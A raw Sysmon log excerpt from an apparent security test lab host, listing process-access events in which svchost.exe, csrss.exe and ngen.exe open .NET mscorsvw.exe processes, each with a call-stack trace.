13:25:42.525{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4656-6000-F803-000000009A01}724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008126Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.509{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4656-6000-F803-000000009A01}724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008125Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.509{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4656-6000-F803-000000009A01}724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008124Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.384{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4656-6000-F703-000000009A01}5036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008123Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.368{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4656-6000-F703-000000009A01}5036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008122Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.368{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4656-6000-F703-000000009A01}5036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008121Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.306{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4656-6000-F603-000000009A01}4016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008120Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.290{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4656-6000-F603-000000009A01}4016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008119Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.290{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4656-6000-F603-000000009A01}4016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008118Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.243{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4656-6000-F503-000000009A01}5076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008117Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.228{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4656-6000-F503-000000009A01}5076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008116Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.228{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4656-6000-F503-000000009A01}5076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008115Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.150{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4656-6000-F403-000000009A01}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008114Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.134{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4656-6000-F403-000000009A01}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008113Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.134{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4656-6000-F403-000000009A01}4160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008112Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.103{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4656-6000-F303-000000009A01}1636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008111Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.087{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4656-6000-F303-000000009A01}1636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008110Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.087{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4656-6000-F303-000000009A01}1636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008109Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.072{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4656-6000-F203-000000009A01}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008108Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.056{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4656-6000-F203-000000009A01}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008107Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.056{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4656-6000-F203-000000009A01}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008106Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.009{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4656-6000-F103-000000009A01}4888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008105Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.993{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4656-6000-F103-000000009A01}4888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008104Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.993{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4656-6000-F103-000000009A01}4888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(w